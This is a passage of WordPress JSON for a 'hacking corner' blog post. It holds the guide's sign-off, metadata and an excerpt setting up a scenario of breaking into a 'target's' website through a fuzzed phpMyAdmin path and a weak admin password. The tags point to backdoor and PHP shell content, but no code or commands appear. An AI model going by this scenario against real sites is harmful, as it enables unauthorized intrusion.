300w\" sizes=\"auto, (max-width: 395px) 100vw, 395px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">\u2026. Well, I think it\u2019s better anyway\u2026. <\/p>\n\n\n\n<p style=\"text-align:center\"><br>I hope you have enjoyed my little guide here, remember this guide won\u2019t work 100% So, play around with it, and always think outside the box.<\/p>\n\n\n\n<p style=\"text-align:center\">Enjoy!<br>-MrJSec \u2764<br>\u201cMade for educational purposes Only.\u201d<br><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cScenario\u201d So, you found your\u201ctargets\u201d website, but you notice it isn\u2019t much you can work with here. Using a URL Fuzzer, you found a \u201cphpMyAdmin\u201d path and surprisingly the admin used a weak password (Or&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[18],"tags":[27,28,26,30,29],"class_list":["post-98","post","type-post","status-publish","format-standard","hentry","category-hacking-corner","tag-backdoor","tag-php","tag-phpmyadmin","tag-shell","tag-web"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/paD3U6-1A","_links":{"self":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/98","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/comments?post=98"}],"version-history":[{"count":14,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/98\/revisions"}],"predecessor-version":[{"id":132,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/posts\/98\/revisions\/132"}],"wp:attachment":[{"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/media?parent=98"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/categories?post=98"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mrjsec.co.uk\/blog\/wp-json\/wp\/v2\/tags?post=98"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}